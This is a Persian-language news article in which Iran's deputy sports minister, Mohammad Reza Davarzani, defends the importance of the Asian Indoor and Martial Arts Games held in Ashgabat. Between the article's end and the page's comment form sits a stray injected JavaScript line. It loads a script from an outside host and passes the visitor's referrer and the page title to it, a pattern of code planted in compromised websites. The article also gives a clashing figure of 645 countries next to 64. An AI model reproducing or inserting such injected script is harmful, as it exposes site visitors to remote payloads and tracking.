داورزنی: بی‌ارزش نگاری بازی‌های داخل سالن جفا به ورزش ایران آسیاست


محمدرضا داورزنی

معاون وزیر ورزش و جوانان حضور گسترده ۶۴ کشور در پنجمین دوره بازی‌های داخل سالن و هنرهای رزمی آسیا و اقیانوسیه را حاکی از اهمیت این رویداد عنوان کرد و گفت: شرکت نکردن و بی‌ارزش نگاری این مسابقات، جفای بزرگی به ورزش کشور و کل مجموعه ورزشی آسیا است.

به گزارش سادس، محمد رضا داورزنی افزود: پنجمین دوره بازی‌های داخل سالن و هنرهای رزمی آسیا و اقیانوسیه با حضور بیش از ۶ هزار ورزشکار دختر و پسر از ۶۴۵ کشور آسیایی و برای نخستین‌بار تیم‌هایی از اقیانوسیه در عشق آباد ترکمنستان برگزار شد.
معاون توسعه ورزش قهرمانی و حرفه‌یی وزیر ورزش با بیان این که این بازی‌ها جزو رقابت‌های رسمی و مهم شورای المپیک آسیا محسوب می‌شود اظهار کرد: شرکت گسترده ۶۴ کشور حاکی از اهمیت چنین مسابقاتی دارد.
داورزنی ادامه داد: از اهداف مهم حضور در این بازی‌ها، ارزیابی استعدادها و کسب تجربه برای جوانان ورزشکار ایرانی است و وجود چنین عرصه‌های رقابتی، سکوی پیشرفت و رشد ورزشکاران خواهد بود بنابراین دستیابی به اهداف وزارت ورزش و جوانان را ممکن می‌کند.
او خاطرنشان کرد: این رویداد خصوصا در حوزه رشته‌هایی که نه در بازی‌های آسیایی و نه در المپیک حضور دارند، فرصتی مغتنم است تا ورزشکاران آن‌ها با شرکت در مسابقات رسمی به کسب تجربه و مدال پرداخته و اعتماد به نفس و انگیزه رشد مهارت‌های ورزشی خود را تقویت کنند.

داورزنی حضور خوب بانوان ایرانی در این رقابت‌ها را ستایش کرد و اظهار کرد: برای اولین‌بار در این دوره از بازی‌ها شاهد حضور دختران در دو رشته کشتی آلیش و بسکتبال سه به سه بودیم که به‌طور قطع و یقین ثمرات مثبت و فراوانی را برای ورزش بانوان در آینده به دنبال خواهد داشت.

معاون توسعه ورزش قهرمانی و حرفه‌یی وزیر ورزش و جوانان تاکید کرد: برگزاری این رقابت‌ها در شرایطی است که هر روز و هر ساعت در قاره اروپا تحت عناوین گوناگون شاهد برگزاری مسابقات و رویدادهای ورزشی مختلف هستیم و شرکت نکردن و بی‌ارزش نگاری مسابقات داخل سالن آسیا جفای بزرگی به ورزش کشور و کل مجموعه ورزشی آسیا خواهد بود.

انتهای پیام

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *